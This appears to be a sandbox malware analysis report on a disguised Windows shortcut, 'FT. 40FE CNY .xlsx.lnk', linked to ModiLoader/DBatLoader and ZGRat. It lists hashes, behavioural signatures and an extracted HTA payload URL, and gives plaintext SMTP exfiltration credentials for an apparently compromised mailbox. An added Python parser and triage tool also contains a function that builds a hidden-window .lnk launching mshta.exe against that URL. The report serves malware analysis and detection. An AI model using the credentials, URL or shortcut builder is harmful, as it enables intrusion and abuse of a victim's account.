General
Target: db982b4701f5517c3401f594d6a14d7499dac01f85f264859723a02c3b67e542
Size: 64KB
Sample: 240424-b1pckadg61
MD5: 8e6a493d50f3bf718847ac93b65a909a
SHA1: 8e2dbe3ea1f553c366da30769f335792a1b9f49c
SHA256: db982b4701f5517c3401f594d6a14d7499dac01f85f264859723a02c3b67e542
SHA512: 1439e1f5cd5c2b66ed2d97a4dbea9852d15f66a1bd4603e46cba649100989c1961caf9f6e8464c690a435826d38734ba8aac4e94d6ab7c770799f1a71c944a27
SSDEEP: 24:5xWJH/G8j/tPIh0A/BHYVKVWXlMT+/CWlrDA4mzScdCZTCJCZkrab0JG:5xWJH/fj9VE5aeCfA4mldCZTCJCZ6aQ
Static task: static1
Behavioral task: behavioral1 (sample: FT. 40FE CNY .xlsx.lnk; resource: win7-20240221-en)
Behavioral task: behavioral2 (sample: FT. 40FE CNY .xlsx.lnk; resource: win10v2004-20240412-en)
Malware Config
Extracted: https://www.sessosesso.it/assets/aw/yt.hta
Extracted: https://www.sessosesso.it/assets/aw/yt.hta
Extracted (exfiltration credentials):
Protocol: smtp
Host: mail.irmaklarpaslanmaz.com.tr
Port: 587
Username: muhasebe@irmaklarpaslanmaz.com.tr
Password: MH5473588PmZ
Targets
Target: FT. 40FE CNY .xlsx.lnk
Size: 2KB
MD5: 82fde340f187a517e0feced1d4972363
SHA1: 07740ba4e30a1dbc830451a0d05130ba1af28be9
SHA256: e900f16dc064f78f6d81fda1dc52a17116d4bb578e6ef528e2f04b3e46b434a3
SHA512: db1630813f3a6e19b9c1bfb6dbaecd3829592230635721df5e2121217bbe2ea2a7594eae7061d5d2ce2baf4bfad5687ce22fa58dba94e8e30b0d7630e872f79c
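The 2KB target is a Windows Shell Link (.lnk) whose name imitates a spreadsheet and whose detonation led to the extracted HTA URL. The report does not show the link's command line, so the following is an added worked example rather than anything from the sandbox report: a minimal MS-SHLLINK parser that pulls the relative path, arguments and ShowCommand out of a .lnk, plus the static triage checks a responder would run before detonating one. The constructed sample (mshta.exe fetching the extracted URL, minimised window), the LOLBin list and the double-extension check are all assumptions of this example, not facts from the report.

```python
"""Minimal MS-SHLLINK (.lnk) parser plus static triage checks.

Added example, not from the sandbox report above. The report gives only the
.lnk's hashes and the HTA URL it led to, so the command line used below is a
constructed guess (mshta.exe fetching that URL), not the real sample's.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# StringData items appear in this fixed order when their flag is set
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))
SW_SHOWMINNOACTIVE = 7  # minimised and not activated: the usual "hidden window" trick
LOLBINS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe",  # assumed list
           "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}


def _read_string(buf, off, unicode):
    """StringData item: 2-byte character count, then the characters (no NUL)."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    if unicode:
        end = off + 2 * count
        return buf[off:end].decode("utf-16-le"), end
    end = off + count
    return buf[off:end].decode("cp1252", "replace"), end


def parse_lnk(buf):
    """Return LinkFlags, ShowCommand and the StringData fields of a .lnk."""
    if len(buf) < 0x4C or struct.unpack_from("<I", buf, 0)[0] != 0x4C \
            or buf[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", buf, 20)
    (show_cmd,) = struct.unpack_from("<I", buf, 60)
    off = 0x4C
    if flags & HAS_IDLIST:        # skip LinkTargetIDList: IDListSize + IDList
        (size,) = struct.unpack_from("<H", buf, off)
        off += 2 + size
    if flags & HAS_LINKINFO:      # skip LinkInfo: LinkInfoSize counts itself
        (size,) = struct.unpack_from("<I", buf, off)
        off += size
    info = {"flags": flags, "show_command": show_cmd}
    for bit, key in STRING_FIELDS:
        if flags & bit:
            info[key], off = _read_string(buf, off, bool(flags & IS_UNICODE))
    return info


def triage(filename, info):
    """Cheap static indicators that make a .lnk worth detonating."""
    findings = []
    if re.search(r"\.(xlsx?|docx?|pdf|txt)\s*\.lnk$", filename, re.I):
        findings.append("double extension masquerading as a document")
    target = (info.get("relative_path") or "").replace("/", "\\").split("\\")[-1].lower()
    if target in LOLBINS:
        findings.append(f"target is a LOLBin: {target}")
    if re.search(r"https?://", info.get("arguments", ""), re.I):
        findings.append("arguments contain a URL")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window minimised/hidden (SW_SHOWMINNOACTIVE)")
    return findings


def build_lnk(relative_path, arguments, show_command=SW_SHOWMINNOACTIVE):
    """Assemble a minimal .lnk (constructed test input; no IDList or LinkInfo)."""
    flags = HAS_RELPATH | HAS_ARGS | IS_UNICODE
    header = (struct.pack("<I", 0x4C) + LNK_CLSID
              + struct.pack("<II", flags, 0x20)   # LinkFlags, FILE_ATTRIBUTE_ARCHIVE
              + b"\x00" * 24                       # creation/access/write FILETIMEs
              + struct.pack("<IIIHHII", 0, 0, show_command, 0, 0, 0, 0))
    assert len(header) == 0x4C

    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + s(relative_path) + s(arguments)


# Constructed sample: the report shows the filename and the HTA URL, not the command line.
SAMPLE_NAME = "FT. 40FE CNY .xlsx.lnk"
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\mshta.exe",
                       "https://www.sessosesso.it/assets/aw/yt.hta")

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE_LNK)
    print(parsed)
    for finding in triage(SAMPLE_NAME, parsed):
        print("[!]", finding)
```

Real droppers usually carry a LinkTargetIDList and LinkInfo pointing at the host binary and often pad the arguments with whitespace so the payload sits past what the Properties dialog displays; the parser skips both variable-length structures by their declared sizes and reads the full argument string, so the padding does not hide the URL from it.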
- Detect ZGRat V1
- ModiLoader, DBatLoader: ModiLoader (also tracked as DBatLoader) is a Delphi-based loader that abuses cloud services to download other malware families.
- ModiLoader Second Stage
- Blocklisted process makes network request
- Checks computer location settings: looks up the country code configured in the registry, most likely as a geofence check.
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application (registry Run-key persistence)
- Suspicious use of SetThreadContext (commonly paired with WriteProcessMemory for process hollowing or thread hijacking)